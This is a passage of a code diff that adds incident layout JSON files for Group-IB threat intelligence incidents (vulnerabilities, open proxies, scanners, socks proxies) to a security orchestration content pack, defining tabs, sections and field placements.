"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-0a6f5400-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "7e231440-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibbulletinfamily", + "height": 22, + "id": "812ad600-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "description", + "height": 22, + "id": "8532c9b0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": 
"gibextendeddescription", + "height": 44, + "id": "89c941c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibreporter", + "height": 22, + "id": "8d1119c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibhasexploit", + "height": 22, + "id": "9212d6c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibhref", + "height": 22, + "id": "97493850-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmergedcvss", + "height": 22, + "id": "9afa3260-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibvulnerabilitytype", + "height": 22, + "id": "a21d6fd0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "39a63eb0-8493-11ef-87c7-cfae65ac92d0", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcpetable", + "height": 106, + "id": "5366d250-8093-11ef-b173-316cf3bf485c", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0b3207c0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "6c7a0d70-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatemodified", + "height": 22, + "id": "7011da30-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": 
"field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatepublished", + "height": 22, + "id": "74626fa0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0be68ab0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibcvssscore", + "height": 22, + "id": "3ec63930-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcvssvector", + "height": 22, + "id": "41d43c80-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssbase", + "height": 22, + "id": "46ac0350-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssexploitability", + "height": 22, + "id": "4d4d6690-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssimpact", + "height": 22, + "id": "50a2fa30-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssoverall", + "height": 22, + "id": "597658a0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvsstemporal", + "height": 22, + "id": "5c71e560-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB CVSS Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": 
"caseinfoid-0c8ba450-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibaffectedsoftwaretable", + "height": 22, + "id": "b5efbfa0-8097-11ef-85a7-fdd86aeef103", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Affected Software", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0d1790a0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "1a71d6c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "1dc71c40-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "2160e4d0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "24525f70-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB OSI Vulnerability Layout", + "name": "GIB OSI Vulnerability Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of 
file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json new file mode 100644 index 000000000000..86d7e5933fb8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json 
@@ -0,0 +1,489 @@ +{ + "description": "Layout for GIB Suspicious IP Open Proxy", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": 
true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 7 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 5 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-71696900-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "807e0950-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "83838120-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "867ff840-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + 
"endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "892a57c0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-722517e0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "8c5b4c60-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "8f834050-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "933db040-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "9620abf0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxyport", + "height": 22, + "id": "99029630-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxysource", + "height": 22, + "id": "9c4da280-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxysources", + "height": 22, + "id": "9d3a2560-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxytype", + "height": 22, + "id": "a187fbb0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "a41cb050-71a9-11ef-8c49-f9d8b5e80cf6", + 
"index": 8, + "listId": "caseinfoid-722517e0-71a9-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Open Proxy Layout", + "name": "GIB Suspicious IP Open Proxy Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json new file mode 100644 index 000000000000..bd4fa42fe89d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json 
@@ -0,0 +1,451 @@ +{ + "description": "Layout for GIB Suspicious IP Scanner", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, 
+ "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-201ec080-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "411bba90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "43ee89a0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "46770940-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibseverity", + "height": 22, + "id": "49829b90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-20be82f0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "2fdc9920-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "32ed3480-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "3596d0b0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "38b74a90-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibscannercategories", + "height": 22, + "id": "3b6bbc30-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Scanner Layout", + "name": "GIB Suspicious IP Scanner Layout", + 
"system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json new file mode 100644 index 000000000000..47fb964f7d17 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json 
@@ -0,0 +1,460 @@ +{ + "description": "Layout for GIB Suspicious IP Socks Proxy", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + 